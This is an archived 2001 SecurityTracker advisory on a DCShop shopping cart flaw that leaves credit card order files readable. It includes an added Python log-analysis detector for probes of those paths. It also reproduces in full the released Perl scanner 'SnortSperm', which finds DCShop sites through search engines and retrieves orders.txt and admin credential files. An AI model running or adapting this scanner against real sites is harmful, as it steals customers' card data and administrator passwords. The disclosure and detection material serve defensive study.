SecurityTracker.com
SecurityTracker
Archives
Category:   Application (Commerce)  >   DCShop Vendors:   DCScripts
(Exploit Code is Released) Re: DCShop Shopping Cart Lets Remote Users Obtain Names and Credit Card Numbers for Recent Orders
SecurityTracker Alert ID:  1002071
SecurityTracker URL:  http://securitytracker.com/id/1002071
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jul 23 2001
Impact:   Disclosure of authentication information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 1.002 BETA; possibly earlier betas
Description:   A vulnerability has been reported in the beta version of DCShop, a shopping cart application. The security hole allows remote users to retrieve credit card numbers in plaintext from the server if the server is not properly configured.

A user reports that exploit code has been released. The exploit code, which is contained in the Source Message, uses popular Internet search engines to locate sites that use DCShop and then attempts to retrieve the orders.txt file. In the vulnerable version of DCShop, the orders.txt file contains unencrypted credit card data for orders recently submitted to the site.

Impact:   A remote user can obtain names, addresses, and credit card data for recent orders from the server. A remote user may also be able to obtain the administrator's username and password from the server.
Solution:   The vendor has posted configuration recommendations. See the Vendor URL.
Vendor URL:  www.dcscripts.com/dcforum/dcshop/44.html
Cause:   Access control error, Configuration error
Underlying OS:  Linux (Any), UNIX (Any), Windows (NT), Windows (2000)
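Detection logic for the retrieval pattern described in this advisory, as an added example that is not part of the advisory, the reported exploit, or DCShop itself: it parses Apache combined-format access-log lines (constructed samples embedded inline) and reports which clients probed the orders.txt and auth_user_file.txt paths, separating confirmed disclosures (HTTP 200, an incident) from blocked scanner attempts. The walk up the directory tree and the two capitalisations are the behaviour the advisory describes; the log lines and addresses are constructed.

```python
import re
from collections import defaultdict

# Constructed sample lines in Apache combined log format (not real traffic). The first
# client walks the directory tree; its third request returns 200, i.e. the file was served.
SAMPLE_LOG = """\
203.0.113.7 - - [23/Jul/2001:10:01:02 +0000] "GET /cgi-bin/dcshop/Orders/orders.txt HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
203.0.113.7 - - [23/Jul/2001:10:01:03 +0000] "GET /cgi-bin/dcshop/orders/orders.txt HTTP/1.0" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
203.0.113.7 - - [23/Jul/2001:10:01:04 +0000] "GET /cgi-bin/Orders/orders.txt HTTP/1.0" 200 1843 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
203.0.113.7 - - [23/Jul/2001:10:01:05 +0000] "GET /cgi-bin/Auth_data/auth_user_file.txt HTTP/1.0" 403 0 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
198.51.100.4 - - [23/Jul/2001:10:05:00 +0000] "GET /cgi-bin/dcshop/dcshop.cgi HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
"""

# Common/combined log prefix: client, identd, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# The two flat files the advisory says are exposed; the scanner tries both
# capitalisations, so match case-insensitively and ignore any query string.
SENSITIVE_RE = re.compile(
    r'/(orders/orders\.txt|auth_data/auth_user_file\.txt)(\?.*)?$', re.IGNORECASE
)

def find_dcshop_probes(log_text):
    """Return {client_ip: {"attempts": n, "disclosed": [paths served with 200]}}."""
    hits = defaultdict(lambda: {"attempts": 0, "disclosed": []})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not SENSITIVE_RE.search(m["path"]):
            continue
        rec = hits[m["ip"]]
        rec["attempts"] += 1
        if m["status"] == "200":
            rec["disclosed"].append(m["path"])
    return dict(hits)

def classify(hits, min_attempts=2):
    """'exposure' if any probe was served (incident), 'scan' if the client walked
    several candidate paths but was blocked, else a single 'probe'."""
    labels = {}
    for ip, rec in hits.items():
        if rec["disclosed"]:
            labels[ip] = "exposure"
        elif rec["attempts"] >= min_attempts:
            labels[ip] = "scan"
        else:
            labels[ip] = "probe"
    return labels
```

Run it over a real log with `classify(find_dcshop_probes(open(path).read()))`; any client labelled "exposure" means the plaintext order or account file was actually served and the affected customers need incident handling.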

Message History:   This archive entry is a follow-up to the message listed below.
Jun 19 2001 DCShop Shopping Cart Lets Remote Users Obtain Names and Credit Card Numbers for Recent Orders



 Source Message Contents

Subject:  DCShop exploit



Hi All,

Seems like there will be a few stolen credit cards floating around in the
next week or two, with this scanner.

--
Sandra



[Editor's Note:  The following encoded file has been decoded for 
your convenience.]

#!/usr/bin/perl
#
# SnortSperm v1.0, a DCShop (Web shopping cart system) order and account scanner
# by darkman, with help of antistar and bsl4
# A proof of concept
#
# Users running windows have to download and install ActivePerl from
# www.activeperl.com, and run the script from the MS-DOS Prompt by typing:
#
# \perl\bin\perl <path of ss.pl>\ss.pl
#
# E-mail: darkman@coderz.net
# Homepage: www.coderz.net/darkman

use LWP::Simple;
use LWP::UserAgent;
my $ua=new LWP::UserAgent;

# flush stdout (so we get 'in progress' messages)
$|=1;

# fake useragent
$ua->agent("Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)");

# hash arrays
my %unique_hosts;
my %flatfiles;
my %pathfiles;
my %additional_paths;

# scanning using search engine
sub search_engine_scan {
	$url = shift;

	print STDERR ".";
	@hosts = split /\n/, get($url);
	for (@hosts) {
		if (/$link/) {
			$1 =~ /(.*)\/.*$/;
			$unique_hosts{$1} = $1;

			additional_hosts($1) if (scalar keys %additional_paths!=0);
		}
		search_engine_scan("$search_engine_url$1") if (/$next/);
	}
}		

# additional paths
sub additional_hosts {
	$url = shift;

	@split_url = split /\//, $url;	
	$stripped_url = "$split_url[0]//$split_url[2]";

	foreach $path (keys %additional_paths) {	
		if ($path =~ /^\//) {
			$unique_hosts{"$stripped_url$path"} = "$stripped_url$path";
		} else {
			$unique_hosts{"$url/$path"} = "$url/$path";
		}
	}	
}

# check arguments
foreach $opt (@ARGV) {
	$proxyserver = $1 if ($opt =~ "proxy=(.*)");
	$proxyport = $1 if ($opt =~ "port=(.*)");
	$altavista = 1 if ($opt eq "altavista");
	$google = 1 if ($opt eq "google");
	$lycos = 1 if ($opt eq "lycos");
	$flatfiles{$1} = $1 if ($opt =~ "flatfile=(.*)");
	$pathfiles{$1} = $1 if ($opt =~ "pathfile=(.*)");
}

# show options if no valid arguments were found
if (!($altavista or $google or $lycos) && (scalar keys %flatfiles==0)) {
	print STDERR "SnortSperm v1.0, a DCShop (Web shopping cart system) order and account scanner\n";
	print STDERR "usage: ./ss.pl <options>\n\nproxy=<proxyserver> for scanning using a proxy server\nport=<proxyport> for specifying proxy port (default proxy port is 8080)\n" .
	"altavista for scanning using altavista\ngoogle for scanning using google\nlycos for scanning using lycos\nflatfile=<filename> for scanning using a flat file\npathfile=<filename> for additional paths\n\noptions can be combined";

	exit;
}

print STDERR "SnortSperm v1.0, a DCShop (Web shopping cart system) order and account scanner\n";

# load additional paths
foreach $pathfile (keys %pathfiles) {
	if ($pathfile ne '') {
        	open(FH, $pathfile);
        	while (<FH>) {
        		chomp;
        		$_ = $1 if (/(.*)\/$/);

        		$additional_paths{$_}=$_ if ($_ ne '');
        	}	
	}
}

# scan through a proxy (insert proxyserver and port)
if ($proxyserver) {
	$proxyport = 8080 if (!$proxyport);

	print STDERR "using $proxyserver:$proxyport as proxy\n";

	$ua->proxy('http',"$proxyserver:$proxyport");
}

# scanning using selected search engines
if ($altavista) {
	print STDERR "\nScanning using altavista";

	$search_engine_url = "http://www.altavista.com";
	$link = "status='([^']*)";
	$next = "a href=\"([^\"]+).*\\[Next";
	search_engine_scan("$search_engine_url/sites/search/web?q=DCShop&pg=q&kl=XX");
}
if ($google) {
	print STDERR "\nScanning using google";

	$search_engine_url = "http://www.google.com";
	$link = "<p><A HREF=([^>]*)";
	$next = "A HREF=([^>]+).*<b>Next<\\/b>";
	search_engine_scan("$search_engine_url/search?q=DCShop");
}
if ($lycos) {
	print STDERR "\nScanning using lycos";

	$search_engine_url = "http://www.lycos.co.uk";
	$link = "<b><a href=\"([^\"]*)";
	$next = "A HREF=([^>]+).*<B>Forward<\\/B>";
	search_engine_scan("$search_engine_url/cgi-bin/pursuit?matchmode=and&mtemp=main&etemp=error&query=DCShop&cat=lycos");
}

# scanning using flat file(s)
foreach $flatfile (keys %flatfiles) {
	if ($flatfile ne '') {
		print STDERR "\nScanning using flat file: $flatfile";

        	open(FH, $flatfile);
        	while (<FH>) {
        		chomp;
        		$_ = "http://$_" if (not /:\/\//);
        		$_ = $1 if (/(.*)\/$/);
        		$unique_hosts{$_}=$_ if ($_ ne 'http:/');

			additional_hosts($_) if ((scalar keys %additional_paths!=0) && ($_ ne 'http:/'));
        	}	
	}
}

# show number of hosts found
$total_hosts = scalar keys %unique_hosts;
print STDERR "\nFound approximately $total_hosts hosts to scan\n\n";

my $url;
# scan for vulnerable hosts
foreach $key (keys %unique_hosts) {
	$first_try = "Orders/orders.txt";
	$second_try = "orders/orders.txt";

	for ($counter=0;$counter<2;$counter++) {
		$url = $key;
		$pos = 1;
		$success = 0;
		while(($success == 0) && (not $url =~ /:\/$/)) {
			print STDERR "Trying $url/$first_try\n";
	
			$url_ = "$url/$first_try";
			$page = get($url_);
			@lines = split /\x0d/, $page;
			if ((@lines+0 == 0) || ($lines[0] =~ /^</) || ($lines[0] =~ /^\n</)) {
				print STDERR "Trying $url/$second_try\n";
	
				$url_ = "$url/$second_try";
				$page = get($url_);
				@lines = split /\x0d/, $page;
			} 	
			if ((@lines+0 > 0) && (not $lines[0] =~ /^</) && (not $lines[0] =~ /^\n</)) {
				print "$url_\n\n";
	
				$success = @lines+0;
				for (@lines) {
					$occurrences = ($_ =~ tr/|//);
					$max_occurrences = $occurrences if ($occurrences > $max_occurrences);
	
					if (/^\n</) {
						print "\n";

						last;
					}
					print "$_";
				}
				print "\n" if ($occurrences == 1);
				print "\n";
				print STDERR "Success.\n\n";
			}
			$url = substr $url,0,rindex $url,"/";
		} 
		print STDERR "No success.\n\n" if ($success == 0);
	
		$first_try = "Auth_data/auth_user_file.txt";
		$second_try = "auth_data/auth_user_file.txt";
	}
}





Copyright 2022, SecurityGlobal.net LLC